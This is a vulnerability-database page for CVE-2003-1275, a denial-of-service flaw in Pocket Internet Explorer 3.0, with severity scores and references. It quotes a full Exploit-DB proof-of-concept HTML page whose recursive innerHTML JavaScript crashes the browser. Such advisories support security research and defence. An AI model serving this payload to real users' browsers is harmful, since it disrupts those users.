CVE-2003-1275 : Detail

CVE-2003-1275

11.18%V4
Network
2005-11-16
07h37 +00:00
2024-09-16
17h43 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Pocket Internet Explorer (PIE) 3.0 allows remote attackers to cause a denial of service (crash) via a Javascript function that uses the object.innerHTML function to recursively call that function.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 22119

Publication date : 2003-01-02 23h00 +00:00
Author : Christopher Sogge Røtnes
EDB Verified : Yes

source: https://www.securityfocus.com/bid/6507/info A denial of service vulnerability has been reported for Pocket Internet Explorer (PIE). The vulnerability is due to the way some JavaScript code is interpreted by PIE. By enticing a victim user to browse a maliciously crafted web page an attacker can cause PIE to crash. <html> <head> <script language="Javascript"> function displayPage(page){ if(page=="onload"){ main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash me</a>";} if(page=="crash"){ main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">crash!</a>";} } </script> </head> <body onLoad="displayPage('onload');"> <hr> <span id="main"></span> </body> </html>

Products Mentioned

Configuraton 0

Microsoft>>Pocket_ie >> Version 3.0

References

http://www.securityfocus.com/bid/6507
Tags : vdb-entry, x_refsource_BID